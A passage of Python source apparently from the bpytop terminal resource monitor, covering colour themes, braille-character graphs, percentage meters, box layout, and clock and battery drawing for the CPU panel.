color = f'{Color.truecolor_to_256(rgb=(int(hexa[1:3], base=16), int(hexa[3:5], base=16), int(hexa[5:7], base=16)), depth=depth)}'
except ValueError as e:
errlog.exception(f'{e}')
else:
if CONFIG.truecolor and not LOW_COLOR:
color = f'\033[{dint};2;{r};{g};{b}m'
else:
color = f'{Color.truecolor_to_256(rgb=(r, g, b), depth=depth)}'
return color
@classmethod
def fg(cls, *args) -> str:
if len(args) > 2: return cls.escape_color(r=args[0], g=args[1], b=args[2], depth="fg")
else: return cls.escape_color(hexa=args[0], depth="fg")
@classmethod
def bg(cls, *args) -> str:
if len(args) > 2: return cls.escape_color(r=args[0], g=args[1], b=args[2], depth="bg")
else: return cls.escape_color(hexa=args[0], depth="bg")
class Colors:
'''Standard colors for menus and dialogs'''
default = Color("#cc")
white = Color("#ff")
red = Color("#bf3636")
green = Color("#68bf36")
blue = Color("#0fd7ff")
yellow = Color("#db8b00")
black_bg = Color("#00", depth="bg")
null = Color("")
class Theme:
'''__init__ accepts a dict containing { "color_element" : "color" }'''
themes: Dict[str, str] = {}
cached: Dict[str, Dict[str, str]] = { "Default" : DEFAULT_THEME }
current: str = ""
main_bg = main_fg = title = hi_fg = selected_bg = selected_fg = inactive_fg = proc_misc = cpu_box = mem_box = net_box = proc_box = div_line = temp_start = temp_mid = temp_end = cpu_start = cpu_mid = cpu_end = free_start = free_mid = free_end = cached_start = cached_mid = cached_end = available_start = available_mid = available_end = used_start = used_mid = used_end = download_start = download_mid = download_end = upload_start = upload_mid = upload_end = graph_text = meter_bg = process_start = process_mid = process_end = Colors.default
gradient: Dict[str, List[str]] = {
"temp" : [],
"cpu" : [],
"free" : [],
"cached" : [],
"available" : [],
"used" : [],
"download" : [],
"upload" : [],
"proc" : [],
"proc_color" : [],
"process" : [],
}
def __init__(self, theme: str):
self.refresh()
self._load_theme(theme)
def __call__(self, theme: str):
for k in self.gradient.keys(): self.gradient[k] = []
self._load_theme(theme)
def _load_theme(self, theme: str):
tdict: Dict[str, str]
if theme in self.cached:
tdict = self.cached[theme]
elif theme in self.themes:
tdict = self._load_file(self.themes[theme])
self.cached[theme] = tdict
else:
errlog.warning(f'No theme named "{theme}" found!')
theme = "Default"
CONFIG.color_theme = theme
tdict = DEFAULT_THEME
self.current = theme
#if CONFIG.color_theme != theme: CONFIG.color_theme = theme
if not "graph_text" in tdict and "inactive_fg" in tdict:
tdict["graph_text"] = tdict["inactive_fg"]
if not "meter_bg" in tdict and "inactive_fg" in tdict:
tdict["meter_bg"] = tdict["inactive_fg"]
if not "process_start" in tdict and "cpu_start" in tdict:
tdict["process_start"] = tdict["cpu_start"]
tdict["process_mid"] = tdict.get("cpu_mid", "")
tdict["process_end"] = tdict.get("cpu_end", "")
#* Get key names from DEFAULT_THEME dict to not leave any color unset if missing from theme dict
for item, value in DEFAULT_THEME.items():
default = item in ["main_fg", "main_bg"]
depth = "bg" if item in ["main_bg", "selected_bg"] else "fg"
if item in tdict:
setattr(self, item, Color(tdict[item], depth=depth, default=default))
else:
setattr(self, item, Color(value, depth=depth, default=default))
#* Create color gradients from one, two or three colors, 101 values indexed 0-100
self.proc_start, self.proc_mid, self.proc_end = self.main_fg, Colors.null, self.inactive_fg
self.proc_color_start, self.proc_color_mid, self.proc_color_end = self.inactive_fg, Colors.null, self.process_start
rgb: Dict[str, Tuple[int, int, int]]
colors: List[List[int]] = []
for name in self.gradient:
rgb = { "start" : getattr(self, f'{name}_start').dec, "mid" : getattr(self, f'{name}_mid').dec, "end" : getattr(self, f'{name}_end').dec }
colors = [ list(getattr(self, f'{name}_start')) ]
if rgb["end"][0] >= 0:
r = 50 if rgb["mid"][0] >= 0 else 100
for first, second in ["start", "mid" if r == 50 else "end"], ["mid", "end"]:
for i in range(r):
colors += [[rgb[first][n] + i * (rgb[second][n] - rgb[first][n]) // r for n in range(3)]]
if r == 100:
break
self.gradient[name] += [ Color.fg(*color) for color in colors ]
else:
c = Color.fg(*rgb["start"])
self.gradient[name] += [c] * 101
#* Set terminal colors
Term.fg = f'{self.main_fg}'
Term.bg = f'{self.main_bg}' if CONFIG.theme_background else "\033[49m"
Draw.now(self.main_fg, self.main_bg)
@classmethod
def refresh(cls):
'''Sets themes dict with names and paths to all found themes'''
cls.themes = { "Default" : "Default" }
try:
for d in (THEME_DIR, USER_THEME_DIR):
if not d: continue
for f in os.listdir(d):
if f.endswith(".theme"):
cls.themes[f'{"" if d == THEME_DIR else "+"}{f[:-6]}'] = f'{d}/{f}'
except Exception as e:
errlog.exception(str(e))
@staticmethod
def _load_file(path: str) -> Dict[str, str]:
'''Load a bashtop formatted theme file and return a dict'''
new_theme: Dict[str, str] = {}
try:
with open(path, "r") as f:
for line in f:
if not line.startswith("theme["): continue
key = line[6:line.find("]")]
s = line.find('"')
value = line[s + 1:line.find('"', s + 1)]
new_theme[key] = value
except Exception as e:
errlog.exception(str(e))
return new_theme
class Banner:
'''Holds the bpytop banner, .draw(line, [col=0], [center=False], [now=False])'''
out: List[str] = []
c_color: str = ""
length: int = 0
if not out:
for num, (color, color2, line) in enumerate(BANNER_SRC):
if len(line) > length: length = len(line)
out_var = ""
line_color = Color.fg(color)
line_color2 = Color.fg(color2)
line_dark = Color.fg(f'#{80 - num * 6}')
for n, letter in enumerate(line):
if letter == "█" and c_color != line_color:
if 5 < n < 25: c_color = line_color2
else: c_color = line_color
out_var += c_color
elif letter == " ":
letter = f'{Mv.r(1)}'
c_color = ""
elif letter != "█" and c_color != line_dark:
c_color = line_dark
out_var += line_dark
out_var += letter
out.append(out_var)
@classmethod
def draw(cls, line: int, col: int = 0, center: bool = False, now: bool = False):
out: str = ""
if center: col = Term.width // 2 - cls.length // 2
for n, o in enumerate(cls.out):
out += f'{Mv.to(line + n, col)}{o}'
out += f'{Term.fg}'
if now: Draw.out(out)
else: return out
class Symbol:
h_line: str = "─"
v_line: str = "│"
left_up: str = "┌"
right_up: str = "┐"
left_down: str = "└"
right_down: str = "┘"
title_left: str = "┤"
title_right: str = "├"
div_up: str = "┬"
div_down: str = "┴"
graph_up: Dict[float, str] = {
0.0 : " ", 0.1 : "⢀", 0.2 : "⢠", 0.3 : "⢰", 0.4 : "⢸",
1.0 : "⡀", 1.1 : "⣀", 1.2 : "⣠", 1.3 : "⣰", 1.4 : "⣸",
2.0 : "⡄", 2.1 : "⣄", 2.2 : "⣤", 2.3 : "⣴", 2.4 : "⣼",
3.0 : "⡆", 3.1 : "⣆", 3.2 : "⣦", 3.3 : "⣶", 3.4 : "⣾",
4.0 : "⡇", 4.1 : "⣇", 4.2 : "⣧", 4.3 : "⣷", 4.4 : "⣿"
}
graph_up_small = graph_up.copy()
graph_up_small[0.0] = "\033[1C"
graph_down: Dict[float, str] = {
0.0 : " ", 0.1 : "⠈", 0.2 : "⠘", 0.3 : "⠸", 0.4 : "⢸",
1.0 : "⠁", 1.1 : "⠉", 1.2 : "⠙", 1.3 : "⠹", 1.4 : "⢹",
2.0 : "⠃", 2.1 : "⠋", 2.2 : "⠛", 2.3 : "⠻", 2.4 : "⢻",
3.0 : "⠇", 3.1 : "⠏", 3.2 : "⠟", 3.3 : "⠿", 3.4 : "⢿",
4.0 : "⡇", 4.1 : "⡏", 4.2 : "⡟", 4.3 : "⡿", 4.4 : "⣿"
}
graph_down_small = graph_down.copy()
graph_down_small[0.0] = "\033[1C"
meter: str = "■"
up: str = "↑"
down: str = "↓"
left: str = "←"
right: str = "→"
enter: str = "↲"
ok: str = f'{Color.fg("#30ff50")}√{Color.fg("#cc")}'
fail: str = f'{Color.fg("#ff3050")}!{Color.fg("#cc")}'
class Graph:
'''Class for creating and adding to graphs
* __str__ : returns graph as a string
* add(value: int) : adds a value to graph and returns it as a string
* __call__ : same as add
'''
out: str
width: int
height: int
graphs: Dict[bool, List[str]]
colors: List[str]
invert: bool
max_value: int
color_max_value: int
offset: int
no_zero: bool
round_up_low: bool
current: bool
last: int
lowest: int = 0
symbol: Dict[float, str]
def __init__(self, width: int, height: int, color: Union[List[str], Color, None], data: List[int], invert: bool = False, max_value: int = 0, offset: int = 0, color_max_value: Union[int, None] = None, no_zero: bool = False, round_up_low: bool = False):
self.graphs: Dict[bool, List[str]] = {False : [], True : []}
self.current: bool = True
self.width = width
self.height = height
self.invert = invert
self.offset = offset
self.round_up_low = round_up_low
self.no_zero = no_zero or round_up_low
if not data: data = [0]
if max_value:
self.lowest = 1 if self.round_up_low else 0
self.max_value = max_value
data = [ min_max((v + offset) * 100 // (max_value + offset), min_max(v + offset, 0, self.lowest), 100) for v in data ] #* Convert values to percentage values of max_value with max_value as ceiling
else:
self.max_value = 0
if color_max_value:
self.color_max_value = color_max_value
else:
self.color_max_value = self.max_value
if self.color_max_value and self.max_value:
color_scale = int(100.0 * self.max_value / self.color_max_value)
else:
color_scale = 100
self.colors: List[str] = []
if isinstance(color, list) and height > 1:
for i in range(1, height + 1): self.colors.insert(0, color[min(100, i * color_scale // height)]) #* Calculate colors of graph
if invert: self.colors.reverse()
elif isinstance(color, Color) and height > 1:
self.colors = [ f'{color}' for _ in range(height) ]
else:
if isinstance(color, list): self.colors = color
elif isinstance(color, Color): self.colors = [ f'{color}' for _ in range(101) ]
if self.height == 1:
self.symbol = Symbol.graph_down_small if invert else Symbol.graph_up_small
else:
self.symbol = Symbol.graph_down if invert else Symbol.graph_up
value_width: int = ceil(len(data) / 2)
filler: str = ""
if value_width > width: #* If the size of given data set is bigger then width of graph, shrink data set
data = data[-(width*2):]
value_width = ceil(len(data) / 2)
elif value_width < width: #* If the size of given data set is smaller then width of graph, fill graph with whitespace
filler = self.symbol[0.0] * (width - value_width)
if len(data) % 2: data.insert(0, 0)
for _ in range(height):
for b in [True, False]:
self.graphs[b].append(filler)
self._create(data, new=True)
def _create(self, data: List[int], new: bool = False):
h_high: int
h_low: int
value: Dict[str, int] = { "left" : 0, "right" : 0 }
val: int
side: str
#* Create the graph
for h in range(self.height):
h_high = round(100 * (self.height - h) / self.height) if self.height > 1 else 100
h_low = round(100 * (self.height - (h + 1)) / self.height) if self.height > 1 else 0
for v in range(len(data)):
if new: self.current = bool(v % 2) #* Switch between True and False graphs
if new and v == 0: self.last = 0
for val, side in [self.last, "left"], [data[v], "right"]: # type: ignore
if val >= h_high:
value[side] = 4
elif val <= h_low:
value[side] = 0
else:
if self.height == 1: value[side] = round(val * 4 / 100 + 0.5)
else: value[side] = round((val - h_low) * 4 / (h_high - h_low) + 0.1)
if self.no_zero and not (new and v == 0 and side == "left") and h == self.height - 1 and value[side] < 1 and not (self.round_up_low and val == 0): value[side] = 1
if new: self.last = data[v]
self.graphs[self.current][h] += self.symbol[float(value["left"] + value["right"] / 10)]
if data: self.last = data[-1]
self.out = ""
if self.height == 1:
self.out += f'{"" if not self.colors else (THEME.inactive_fg if self.last < 5 else self.colors[self.last])}{self.graphs[self.current][0]}'
elif self.height > 1:
for h in range(self.height):
if h > 0: self.out += f'{Mv.d(1)}{Mv.l(self.width)}'
self.out += f'{"" if not self.colors else self.colors[h]}{self.graphs[self.current][h if not self.invert else (self.height - 1) - h]}'
if self.colors: self.out += f'{Term.fg}'
def __call__(self, value: Union[int, None] = None) -> str:
if not isinstance(value, int): return self.out
self.current = not self.current
if self.height == 1:
if self.graphs[self.current][0].startswith(self.symbol[0.0]):
self.graphs[self.current][0] = self.graphs[self.current][0].replace(self.symbol[0.0], "", 1)
else:
self.graphs[self.current][0] = self.graphs[self.current][0][1:]
else:
for n in range(self.height):
self.graphs[self.current][n] = self.graphs[self.current][n][1:]
if self.max_value: value = min_max((value + self.offset) * 100 // (self.max_value + self.offset), min_max(value + self.offset, 0, self.lowest), 100)
self._create([value])
return self.out
def add(self, value: Union[int, None] = None) -> str:
return self.__call__(value)
def __str__(self):
return self.out
def __repr__(self):
return repr(self.out)
class Graphs:
'''Holds all graphs and lists of graphs for dynamically created graphs'''
cpu: Dict[str, Graph] = {}
cores: List[Graph] = [NotImplemented] * THREADS
temps: List[Graph] = [NotImplemented] * (THREADS + 1)
net: Dict[str, Graph] = {}
detailed_cpu: Graph = NotImplemented
detailed_mem: Graph = NotImplemented
pid_cpu: Dict[int, Graph] = {}
disk_io: Dict[str, Dict[str, Graph]] = {}
class Meter:
'''Creates a percentage meter
__init__(value, width, theme, gradient_name) to create new meter
__call__(value) to set value and return meter as a string
__str__ returns last set meter as a string
'''
out: str
color_gradient: List[str]
color_inactive: Color
gradient_name: str
width: int
invert: bool
saved: Dict[int, str]
def __init__(self, value: int, width: int, gradient_name: str, invert: bool = False):
self.gradient_name = gradient_name
self.color_gradient = THEME.gradient[gradient_name]
self.color_inactive = THEME.meter_bg
self.width = width
self.saved = {}
self.invert = invert
self.out = self._create(value)
def __call__(self, value: Union[int, None]) -> str:
if not isinstance(value, int): return self.out
if value > 100: value = 100
elif value < 0: value = 100
if value in self.saved:
self.out = self.saved[value]
else:
self.out = self._create(value)
return self.out
def __str__(self) -> str:
return self.out
def __repr__(self):
return repr(self.out)
def _create(self, value: int) -> str:
if value > 100: value = 100
elif value < 0: value = 100
out: str = ""
for i in range(1, self.width + 1):
if value >= round(i * 100 / self.width):
out += f'{self.color_gradient[round(i * 100 / self.width) if not self.invert else round(100 - (i * 100 / self.width))]}{Symbol.meter}'
else:
out += self.color_inactive(Symbol.meter * (self.width + 1 - i))
break
else:
out += f'{Term.fg}'
if not value in self.saved:
self.saved[value] = out
return out
class Meters:
cpu: Meter
battery: Meter
mem: Dict[str, Union[Meter, Graph]] = {}
swap: Dict[str, Union[Meter, Graph]] = {}
disks_used: Dict[str, Meter] = {}
disks_free: Dict[str, Meter] = {}
class Box:
'''Box class with all needed attributes for create_box() function'''
name: str
num: int = 0
boxes: List = []
view_modes: Dict[str, List] = {"full" : ["cpu", "mem", "net", "proc"], "stat" : ["cpu", "mem", "net"], "proc" : ["cpu", "proc"]}
view_mode: str
for view_mode in view_modes:
if sorted(CONFIG.shown_boxes.split(), key=str.lower) == view_modes[view_mode]:
break
else:
view_mode = "user"
view_modes["user"] = CONFIG.shown_boxes.split()
height_p: int
width_p: int
x: int
y: int
width: int
height: int
out: str
bg: str
_b_cpu_h: int
_b_mem_h: int
redraw_all: bool
buffers: List[str] = []
c_counter: int = 0
clock_on: bool = False
clock: str = ""
clock_len: int = 0
resized: bool = False
clock_custom_format: Dict[str, Any] = {
"/host" : os.uname()[1],
"/user" : os.environ.get("USER") or pwd.getpwuid(os.getuid())[0],
"/uptime" : "",
}
if clock_custom_format["/host"].endswith(".local"):
clock_custom_format["/host"] = clock_custom_format["/host"].replace(".local", "")
@classmethod
def calc_sizes(cls):
'''Calculate sizes of boxes'''
cls.boxes = CONFIG.shown_boxes.split()
for sub in cls.__subclasses__():
sub._calc_size() # type: ignore
sub.resized = True # type: ignore
@classmethod
def draw_update_ms(cls, now: bool = True):
if not "cpu" in cls.boxes: return
update_string: str = f'{CONFIG.update_ms}ms'
xpos: int = CpuBox.x + CpuBox.width - len(update_string) - 15
if not "+" in Key.mouse:
Key.mouse["+"] = [[xpos + 7 + i, CpuBox.y] for i in range(3)]
Key.mouse["-"] = [[CpuBox.x + CpuBox.width - 4 + i, CpuBox.y] for i in range(3)]
Draw.buffer("update_ms!" if now and not Menu.active else "update_ms",
f'{Mv.to(CpuBox.y, xpos)}{THEME.cpu_box(Symbol.h_line * 7, Symbol.title_left)}{Fx.b}{THEME.hi_fg("+")} ',
f'{THEME.title(update_string)} {THEME.hi_fg("-")}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}', only_save=Menu.active, once=True)
if now and not Menu.active:
Draw.clear("update_ms")
if CONFIG.show_battery and hasattr(psutil, "sensors_battery") and psutil.sensors_battery():
Draw.out("battery")
@classmethod
def draw_clock(cls, force: bool = False):
if not "cpu" in cls.boxes or not cls.clock_on: return
cls.c_counter += 1
if cls.c_counter > 3600 / (Config.update_ms / 1000):
tzset()
cls.c_counter = 0
out: str = ""
if force: pass
elif Term.resized or strftime(CONFIG.draw_clock) == cls.clock: return
clock_string = cls.clock = strftime(CONFIG.draw_clock)
for custom in cls.clock_custom_format:
if custom in clock_string:
if custom == "/uptime": cls.clock_custom_format["/uptime"] = CpuCollector.uptime
clock_string = clock_string.replace(custom, cls.clock_custom_format[custom])
clock_len = len(clock_string[:(CpuBox.width-56)])
if cls.clock_len != clock_len and not CpuBox.resized:
out = f'{Mv.to(CpuBox.y, ((CpuBox.width)//2)-(cls.clock_len//2))}{Fx.ub}{THEME.cpu_box}{Symbol.h_line * cls.clock_len}'
cls.clock_len = clock_len
now: bool = False if Menu.active else not force
out += (f'{Mv.to(CpuBox.y, ((CpuBox.width)//2)-(clock_len//2))}{Fx.ub}{THEME.cpu_box}'
f'{Symbol.title_left}{Fx.b}{THEME.title(clock_string[:clock_len])}{Fx.ub}{THEME.cpu_box}{Symbol.title_right}{Term.fg}')
Draw.buffer("clock", out, z=1, now=now, once=not force, only_save=Menu.active)
if now and not Menu.active:
if CONFIG.show_battery and hasattr(psutil, "sensors_battery") and psutil.sensors_battery():
Draw.out("battery")
@classmethod
def empty_bg(cls) -> str:
return (f'{Term.clear}' +
(f'{Banner.draw(Term.height // 2 - 10, center=True)}'
f'{Mv.d(1)}{Mv.l(46)}{Colors.black_bg}{Colors.default}{Fx.b}[esc] Menu'
f'{Mv.r(25)}{Fx.i}Version: {VERSION}{Fx.ui}' if Term.height > 22 else "") +
f'{Mv.d(1)}{Mv.l(34)}{Fx.b}All boxes hidden!'
f'{Mv.d(1)}{Mv.l(17)}{Fx.b}[1] {Fx.ub}Toggle CPU box'
f'{Mv.d(1)}{Mv.l(18)}{Fx.b}[2] {Fx.ub}Toggle MEM box'
f'{Mv.d(1)}{Mv.l(18)}{Fx.b}[3] {Fx.ub}Toggle NET box'
f'{Mv.d(1)}{Mv.l(18)}{Fx.b}[4] {Fx.ub}Toggle PROC box'
f'{Mv.d(1)}{Mv.l(19)}{Fx.b}[m] {Fx.ub}Cycle presets'
f'{Mv.d(1)}{Mv.l(17)}{Fx.b}[q] Quit {Fx.ub}{Term.bg}{Term.fg}')
@classmethod
def draw_bg(cls, now: bool = True):
'''Draw all boxes outlines and titles'''
out: str = ""
if not cls.boxes:
out = cls.empty_bg()
else:
out = "".join(sub._draw_bg() for sub in cls.__subclasses__()) # type: ignore
Draw.buffer("bg", out, now=now, z=1000, only_save=Menu.active, once=True)
cls.draw_update_ms(now=now)
if CONFIG.draw_clock: cls.draw_clock(force=True)
class SubBox:
box_x: int = 0
box_y: int = 0
box_width: int = 0
box_height: int = 0
box_columns: int = 0
column_size: int = 0
class CpuBox(Box, SubBox):
name = "cpu"
num = 1
x = 1
y = 1
height_p = 32
width_p = 100
min_w: int = 60
min_h: int = 8
resized: bool = True
redraw: bool = False
buffer: str = "cpu"
battery_percent: int = 1000
battery_secs: int = 0
battery_status: str = "Unknown"
old_battery_pos = 0
old_battery_len = 0
battery_path: Union[str, None] = ""
battery_clear: bool = False
battery_symbols: Dict[str, str] = {"Charging": "▲",
"Discharging": "▼",
"Full": "■",
"Not charging": "■"}
clock_block: bool = True
Box.buffers.append(buffer)
@classmethod
def _calc_size(cls):
if not "cpu" in cls.boxes:
Box._b_cpu_h = 0
cls.width = Term.width
return
cpu = CpuCollector
height_p: int
if cls.boxes == ["cpu"]:
height_p = 100
else:
height_p = cls.height_p
cls.width = round(Term.width * cls.width_p / 100)
cls.height = round(Term.height * height_p / 100)
if cls.height < 8: cls.height = 8
Box._b_cpu_h = cls.height
#THREADS = 64
cls.box_columns = ceil((THREADS + 1) / (cls.height - 5))
if cls.box_columns * (20 + 13 if cpu.got_sensors else 21) < cls.width - (cls.width // 3):
cls.column_size = 2
cls.box_width = (20 + 13 if cpu.got_sensors else 21) * cls.box_columns - ((cls.box_columns - 1) * 1)
elif cls.box_columns * (15 + 6 if cpu.got_sensors else 15) < cls.width - (cls.width // 3):
cls.column_size = 1
cls.box_width = (15 + 6 if cpu.got_sensors else 15) * cls.box_columns - ((cls.box_columns - 1) * 1)
elif cls.box_columns * (8 + 6 if cpu.got_sensors else 8) < cls.width - (cls.width // 3):
cls.column_size = 0
else:
cls.box_columns = (cls.width - cls.width // 3) // (8 + 6 if cpu.got_sensors else 8); cls.column_size = 0
if cls.column_size == 0: cls.box_width = (8 + 6 if cpu.got_sensors else 8) * cls.box_columns + 1
cls.box_height = ceil(THREADS / cls.box_columns) + 4
if cls.box_height > cls.height - 2: cls.box_height = cls.height - 2
cls.box_x = (cls.width - 1) - cls.box_width
cls.box_y = cls.y + ceil((cls.height - 2) / 2) - ceil(cls.box_height / 2) + 1
@classmethod
def _draw_bg(cls) -> str:
if not "cpu" in cls.boxes: return ""
if not "M" in Key.mouse:
Key.mouse["M"] = [[cls.x + 10 + i, cls.y] for i in range(6)]
return (f'{create_box(box=cls, line_color=THEME.cpu_box)}'
f'{Mv.to(cls.y, cls.x + 10)}{THEME.cpu_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg("M")}{THEME.title("enu")}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}'
f'{create_box(x=cls.box_x, y=cls.box_y, width=cls.box_width, height=cls.box_height, line_color=THEME.div_line, fill=False, title=CPU_NAME[:cls.box_width - 14] if not CONFIG.custom_cpu_name else CONFIG.custom_cpu_name[:cls.box_width - 14])}')
@classmethod
def battery_activity(cls) -> bool:
if not hasattr(psutil, "sensors_battery") or psutil.sensors_battery() == None:
if cls.battery_percent != 1000:
cls.battery_clear = True
return False
if cls.battery_path == "":
cls.battery_path = None
if os.path.isdir("/sys/class/power_supply"):
for directory in sorted(os.listdir("/sys/class/power_supply")):
if directory.startswith('BAT') or 'battery' in directory.lower():
cls.battery_path = f'/sys/class/power_supply/{directory}/'
break
return_true: bool = False
percent: int = ceil(getattr(psutil.sensors_battery(), "percent", 0))
if percent != cls.battery_percent:
cls.battery_percent = percent
return_true = True
seconds: int = getattr(psutil.sensors_battery(), "secsleft", 0)
if seconds != cls.battery_secs:
cls.battery_secs = seconds
return_true = True
status: str = "not_set"
if cls.battery_path:
status = readfile(cls.battery_path + "status", default="not_set")
if status == "not_set" and getattr(psutil.sensors_battery(), "power_plugged", None) == True:
status = "Charging" if cls.battery_percent < 100 else "Full"
elif status == "not_set" and getattr(psutil.sensors_battery(), "power_plugged", None) == False:
status = "Discharging"
elif status == "not_set":
status = "Unknown"
if status != cls.battery_status:
cls.battery_status = status
return_true = True
return return_true or cls.resized or cls.redraw or Menu.active
@classmethod
def _draw_fg(cls):
if not "cpu" in cls.boxes: return
cpu = CpuCollector
if cpu.redraw: cls.redraw = True
out: str = ""
out_misc: str = ""
lavg: str = ""
x, y, w, h = cls.x + 1, cls.y + 1, cls.width - 2, cls.height - 2
bx, by, bw, bh = cls.box_x + 1, cls.box_y + 1, cls.box_width - 2, cls.box_height - 2
hh: int = ceil(h / 2)
hh2: int = h - hh
mid_line: bool = False
temp: int = 0
unit: str = ""
if not CONFIG.cpu_single_graph and CONFIG.cpu_graph_upper != CONFIG.cpu_graph_lower:
mid_line = True
if h % 2: hh = floor(h / 2)
else: hh2 -= 1
hide_cores: bool = (cpu.cpu_temp_only or not CONFIG.show_coretemp) and cpu.got_sensors
ct_width: int = (max(6, 6 * cls.column_size)) * hide_cores
if cls.resized or cls.redraw:
if not "m" in Key.mouse:
Key.mouse["m"] = [[cls.x + 16 + i, cls.y] for i in range(12)]
out_misc += f'{Mv.to(cls.y, cls.x + 16)}{THEME.cpu_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg("m")}{THEME.title}ode:{Box.view_mode}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}'
Graphs.cpu["up"] = Graph(w - bw - 3, (h if CONFIG.cpu_single_graph else hh), THEME.gradient["cpu"], cpu.cpu_upper, round_up_low=True)
if not CONFIG.cpu_single_graph:
Graphs.cpu["down"] = Graph(w - bw - 3, hh2, THEME.gradient["cpu"], cpu.cpu_lower, invert=CONFIG.cpu_invert_lower, round_up_low=True)
Meters.cpu = Meter(cpu.cpu_usage[0][-1], bw - (21 if cpu.got_sensors else 9), "cpu")
if cls.column_size > 0 or ct_width > 0:
for n in range(THREADS):
Graphs.cores[n] = Graph(5 * cls.column_size + ct_width, 1, None, cpu.cpu_usage[n + 1])
if cpu.got_sensors:
Graphs.temps[0] = Graph(5, 1, None, cpu.cpu_temp[0], max_value=cpu.cpu_temp_crit, offset=-23)
if cls.column_size > 1:
for n in range(1, THREADS + 1):
if not cpu.cpu_temp[n]:
continue
Graphs.temps[n] = Graph(5, 1, None, cpu.cpu_temp[n], max_value=cpu.cpu_temp_crit, offset=-23)
Draw.buffer("cpu_misc", out_misc, only_save=True)
if CONFIG.show_battery and cls.battery_activity():
bat_out: str = ""
if cls.battery_secs > 0:
battery_time: str = f' {cls.battery_secs // 3600:02}:{(cls.battery_secs % 3600) // 60:02}'
else:
battery_time = ""
if not hasattr(Meters, "battery") or cls.resized:
Meters.battery = Meter(cls.battery_percent, 10, "cpu", invert=True)
battery_symbol: str = cls.battery_symbols.get(cls.battery_status, "○")
battery_len: int = len(f'{CONFIG.update_ms}') + (11 if cls.width >= 100 else 0) + len(battery_time) + len(f'{cls.battery_percent}')
battery_pos = cls.width - battery_len - 17
if (battery_pos != cls.old_battery_pos or battery_len != cls.old_battery_len) and cls.old_battery_pos > 0 and not cls.resized:
bat_out += f'{Mv.to(y-1, cls.old_battery_pos)}{THEME.cpu_box(Symbol.h_line*(cls.old_battery_len+4))}'
cls.old_battery_pos, cls.old_battery_len = battery_pos, battery_len
bat_out += (f'{Mv.to(y-1, battery_pos)}{THEME.cpu_box(Symbol.title_left)}{Fx.b}{THEME.title}BAT{battery_symbol} {cls.battery_percent}%'+
("" if cls.width < 100 else f' {Fx.ub}{Meters.battery(cls.battery_percent)}{Fx.b}') +
f'{THEME.title}{battery_time}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}')
Draw.buffer("battery", f'{bat_out}{Term.fg}', only_save=Menu.active)
elif cls.battery_clear:
out += f'{Mv.to(y-1, cls.old_battery_pos)}{THEME.cpu_box(Symbol.h_line*(cls.old_battery_len+4))}'
cls.battery_clear = False
cls.battery_percent = 1000
cls.battery_secs = 0
cls.battery_status = "Unknown"
cls.old_battery_pos = 0
cls.old_battery_len = 0
cls.battery_path = ""
Draw.clear("battery", saved=True)
cx = cy = cc = 0
ccw = (bw + 1) // cls.box_columns
if cpu.cpu_freq:
freq: str = f'{cpu.cpu_freq} Mhz' if cpu.cpu_freq < 1000 else f'{float(cpu.cpu_freq / 1000):.1f} GHz'
out += f'{Mv.to(by - 1, bx + bw - 9)}{THEME.div_line(Symbol.title_left)}{Fx.b}{THEME.title(freq)}{Fx.ub}{THEME.div_line(Symbol.title_right)}'
out += f'{Mv.to(y, x)}{Graphs.cpu["up"](None if cls.resized else cpu.cpu_upper[-1])}'
if mid_line:
out += (f'{Mv.to(y+hh, x-1)}{THEME.cpu_box(Symbol.title_right)}{THEME.div_line}{Symbol.h_line * (w - bw - 3)}{THEME.div_line(Symbol.title_left)}'
f'{Mv.to(y+hh, x+((w-bw)//2)-((len(CONFIG.cpu_graph_upper)+len(CONFIG.cpu_graph_lower))//2)-4)}{THEME.main_fg}{CONFIG.cpu_graph_upper}{Mv.r(1)}▲▼{Mv.r(1)}{CONFIG.cpu_graph_lower}')
if not CONFIG.cpu_single_graph and Graphs.cpu.get("down"):
out += f'{Mv.to(y + hh + (1 * mid_line), x)}{Graphs.cpu["down"](None if cls.resized else cpu.cpu_lower[-1])}'
out += (f'{THEME.main_fg}{Mv.to(by + cy, bx + cx)}{Fx.b}{"CPU "}{Fx.ub}{Meters.cpu(cpu.cpu_usage[0][-1])}'
f'{THEME.gradient["cpu"][cpu.cpu_usage[0][-1]]}{cpu.cpu_usage[0][-1]:>4}{THEME.main_fg}%')
if cpu.got_sensors:
try:
temp, unit = temperature(cpu.cpu_temp[0][-1], CONFIG.temp_scale)
out += (f'{THEME.inactive_fg} ⡀⡀⡀⡀⡀{Mv.l(5)}{THEME.gradient["temp"][min_max(cpu.cpu_temp[0][-1], 0, cpu.cpu_temp_crit) * 100 // cpu.cpu_temp_crit]}{Graphs.temps[0](None if cls.resized else cpu.cpu_temp[0][-1])}'
f'{temp:>4}{THEME.main_fg}{unit}')
except:
cpu.got_sensors = False
cy += 1
for n in range(1, THREADS + 1):
out += f'{THEME.main_fg}{Mv.to(by + cy, bx + cx)}{Fx.b + "C" + Fx.ub if THREADS < 100 else ""}{str(n):<{2 if cls.column_size == 0 else 3}}'
if cls.column_size > 0 or ct_width > 0:
out += f'{THEME.inactive_fg}{"⡀" * (5 * cls.column_size + ct_width)}{Mv.l(5 * cls.column_size + ct_width)}{THEME.gradient["cpu"][cpu.cpu_usage[n][-1]]}{Graphs.cores[n-1](None if cls.resized else cpu.cpu_usage[n][-1])}'
else:
out += f'{THEME.gradient["cpu"][cpu.cpu_usage[n][-1]]}'
out += f'{cpu.cpu_usage[n][-1]:>{3 if cls.column_size < 2 else 4}}{THEME.main_fg}%'
if cpu.got_sensors and cpu.cpu_temp[n] and not hide_cores:
try:
temp, unit = temperature(cpu.cpu_temp[n][-1], CONFIG.temp_scale)
if cls.column_size > 1:
out += f'{THEME.inactive_fg} ⡀⡀⡀⡀⡀{Mv.l(5)}{THEME.gradient["temp"][min_max(cpu.cpu_temp[n][-1], 0, cpu.cpu_temp_crit) * 100 // cpu.cpu_temp_crit]}{Graphs.temps[n](None if cls.resized else cpu.cpu_temp[n][-1])}'
else:
out += f'{THEME.gradient["temp"][min_max(temp, 0, cpu.cpu_temp_crit) * 100 // cpu.cpu_temp_crit]}'
out += f'{temp:>4}{THEME.main_fg}{unit}'
except:
cpu.got_sensors = False
elif cpu.got_sensors and not hide_cores:
